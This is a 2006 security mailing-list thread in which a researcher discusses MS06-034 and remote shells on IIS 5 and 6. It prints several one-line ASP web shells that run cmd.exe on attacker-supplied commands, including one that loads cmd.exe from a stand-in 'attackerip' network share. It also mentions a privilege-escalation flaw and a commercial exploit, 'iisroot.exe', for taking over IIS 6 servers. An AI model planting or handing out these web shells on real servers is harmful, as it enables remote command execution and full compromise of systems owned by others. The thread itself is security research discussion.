Re: MS06-034 lies? IIS 6 can still be owned?

[Cesar <sqlsec () yahoo com>]

Some corrections:

I forgot to mention that for the remote asp shell you
will need permissions on cmd.exe because by default it
can't be accessed but you can use the next (or other
tricks available):

<%=server.createobject("wscript.shell").exec(Server.MapPath("youruploadedCmd.exe")&
" /c " & response("cmd")).stdout.readall %>

Also it's not necesary to upload a binary to the
server since you can:

<%=server.createobject("wscript.shell").exec("\\attackerip\share\cmd.exe"
& " /c " & response("cmd")).stdout.readall %>

Thanks a lot to Brett for pointing out the cmd.exe
permissions issue.

Cesar.

--- Cesar <sqlsec () yahoo com> wrote:

> MS06-034 lies? IIS 6 can still be owned?
>
> Hi all.
>
> After early getting the details of MS06-034 I
> thought
> it will be cool to build the exploits since there
> has
> been long time without any IIS exploit and our
> customers  (see *1) will like it, so I asked the
> guys
> to build the exploits and that I will take care of
> the
> part of elevating privileges since I had some theory
> that there was a way to elevate privilegs. 
> What was funny is that some time later I realized
> that
> if you can upload an asp page then it's pretty
> simple
> to have a remote shell running under the same
> account
> that the exploits would run:
>
> -----shell.asp (got this from xfocus.org)------
<%=server.createobject("wscript.shell").exec("cmd.exe
> /c " & request("command")).stdout.readall%>
> -------------------------------------------
> So I wonder why MS patched the vulnerability if it's
> pretty simple to have a remote shell on default
> configurations?
>
> Mabye because wscript.shell can be disabled,
> removed,
> etc. or you can't run not upload .exe on the server,
> in these cases the exploit will be handy.
>
> Also MS stated:
> -----------------------------
> on Mitigating Factors ....
>
> • On IIS 5.0 and IIS 5.1, ASP enabled applications
> by
> default run in the 'Pooled Out of Process'
> application, which means they run in DLLHOST.exe,
> which is running in the context of the low privilege
> IWAM_<machinename> account.
>   
> • By default, ASP is not enabled on IIS 6.0. If ASP
> is
> enabled, it runs in the context of a W3WP.exe worker
> process running as the low privilege
> 'NetworkService'
> account.
>
> on FAQ Workarounds...
> -What might an attacker use the vulnerability to do?
> An attacker who successfully exploited this
> vulnerability could take complete control of the
> affected system.
>
> ----------------------
> That's pretty confusing since they are saying IIS 5
> &
> 6 runs under a low privileged accounts and then they
> say an attacker could take complete control...???
>
> My theory on the elevation of privileges was in part
> wrong but I could elevate privileges so now the
> exploits can also give you a remote shell under an
> administrative account which I think this is why MS
> patched the vulnerability.
> While MS fixed the ASP vulnerability they didn't
> fixed
> a design flaw that allows to elevate privilges if
> you
> can run code under IIS 5 & 6 low privileged accounts
> :)
>
> So now we will have available for our customers:
> iisroot.exe that if ran from an ASP (.NET also) web
> page on default settings it can own IIS 6 (and the
> server of course).
>
>
> Cesar.
> (*1 http://www.argeniss.com/products.html)
>
>
>
> __________________________________________________
> Do You Yahoo!?
> Tired of spam?  Yahoo! Mail has the best spam
> protection around 
> http://mail.yahoo.com 
> _______________________________________________
> Dailydave mailing list
> Dailydave () lists immunitysec com
http://lists.immunitysec.com/mailman/listinfo/dailydave
>


__________________________________________________
Do You Yahoo!?
Tired of spam?  Yahoo! Mail has the best spam protection around 
http://mail.yahoo.com 
_______________________________________________
Dailydave mailing list
Dailydave () lists immunitysec com
http://lists.immunitysec.com/mailman/listinfo/dailydave